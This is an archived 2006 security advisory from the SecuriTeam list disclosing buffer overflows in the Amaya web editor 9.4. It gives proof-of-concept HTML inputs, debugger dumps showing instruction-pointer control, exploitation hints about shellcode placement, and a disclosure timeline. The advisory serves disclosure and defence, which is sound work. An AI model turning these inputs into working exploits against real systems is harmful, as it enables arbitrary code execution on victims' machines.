Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NEWS] Amaya Multiple Buffer Overflows

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NEWS] Amaya Multiple Buffer Overflows
Date: 18 Apr 2006 12:36:27 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Amaya Multiple Buffer Overflows
------------------------------------------------------------------------


SUMMARY

 <http://www.w3.org/Amaya/> Amaya is a Web editor, i.e. a tool used to 
create and update documents directly on the Web.

Improper handling of unexpected properties allows attackers to trigger 
buffer overflows with Amaya and execute arbitrary code.

DETAILS

Vulnerable Systems:
 * Amaya version 9.4 and prior

Immune Systems:
 * Amaya version 9.5

Using non standard values for html tags will cause a buffer overflow with 
Amaya and crash the program.

Proof of Concept:
< colgroup compact="Ax200">

eax=000000f9 ebx=02ae8420 ecx=77bcec76 edx=41414141 esi=007b9420
edi=01ae6d5c eip=004edd95 esp=0012e7ac ebp=007d6110 iopl=0
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000  efl=00010206

         004edd61 03f3             add     esi,ebx
         004edd63 a4               movsb
         004edd64 8b4500           mov     eax,[ebp]
         004edd67 8b8c241c010000   mov     ecx,[esp+0x11c]
         004edd6e 8b942418010000   mov     edx,[esp+0x118]
         004edd75 50               push    eax
         004edd76 51               push    ecx
         004edd77 53               push    ebx
         004edd78 52               push    edx
         004edd79 e8a23c0200       call    amaya+0x111a20 (00511a20)
         004edd7e 53               push    ebx
         004edd7f e83cf90000       call    amaya+0xfd6c0 (004fd6c0)
         004edd84 83c428           add     esp,0x28
         004edd87 8bbc24fc000000   mov     edi,[esp+0xfc]
         004edd8e 8b942400010000   mov     edx,[esp+0x100]
 FAULT ->004edd95 8b4240           mov     eax,[edx+0x40]
                                           ds:0023:41414181=????????
         004edd98 83f844           cmp     eax,0x44
         004edd9b 0f8527030000     jne     amaya+0xee0c8 (004ee0c8)
         004edda1 837c242457       cmp     dword ptr [esp+0x24],0x57
         004edda6 0f8465060000     je      amaya+0xee411 (004ee411)
         004eddac 8b4500           mov     eax,[ebp]
         004eddaf 8b8c2408010000   mov     ecx,[esp+0x108]
         004eddb6 6aff             push    0xff
         004eddb8 50               push    eax
         004eddb9 51               push    ecx
         004eddba 57               push    edi
         004eddbb e8d33af1ff       call    amaya+0x1893 (00401893)
         004eddc0 83c410           add     esp,0x10
         004eddc3 5f               pop     edi
         004eddc4 5e               pop     esi
         004eddc5 5d               pop     ebp

 <textarea rows=
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB>

 eax=00000001 ebx=00000000 ecx=77c10e72 edx=007bd472
 esi=0000003e edi=00000000 eip=42424242 esp=0012ea38 ebp=00000000

 Function: <nosymbols>
 No prior disassembly possible
 42424242 ?? ???
 42424244 ?? ???
 42424246 ?? ???
 42424248 ?? ???
 4242424a ?? ???
 4242424c ?? ???

Successful exploitation of this vulnerability is not that easy because 
non-text characters were modified during parsing therefore you have to 
find a place where to place the shellcode. Naturally you have to avoid 
null bytes too because Amaya would stop parsing the attribute value and 
the overflow would not get triggered.

Examples:
 
<http://morph3us.org/security/pen-testing/amaya/amaya-94-textarea-rows.html> 
http://morph3us.org/security/pen-testing/amaya/amaya-94-textarea-rows.html
 
<http://morph3us.org/security/pen-testing/amaya/amaya-94-legend-color.html> 
http://morph3us.org/security/pen-testing/amaya/amaya-94-legend-color.html

Vendor Status:
The vendor has issued a fix with version 9.5.

Disclosure Timeline:
21 Dec 05 - Vulnerability discovered.
21 Feb 06 - Vendor contacted.
23 Feb 06 - Vendor confirmed vulnerability.
08 Mar 06 - Vendor fixed vulnerability.
12 Apr 06 - Public release.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:bugtraq@morph3us.org> Thomas 
Waldegger.
The original article can be found at:  
<http://morph3us.org/advisories/20060412-amaya-94.txt> 
http://morph3us.org/advisories/20060412-amaya-94.txt



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NEWS] Amaya Multiple Buffer Overflows, SecuriTeam <=
Previous by Date:  [NT] Cumulative Security Update for Internet Explorer (MS06-013), SecuriTeam
Next by Date:  [NEWS] Cisco IOS XR MPLS Multiple DoS, SecuriTeam
Previous by Thread:  [NT] Cumulative Security Update for Internet Explorer (MS06-013), SecuriTeam
Next by Thread:  [NEWS] Cisco IOS XR MPLS Multiple DoS, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]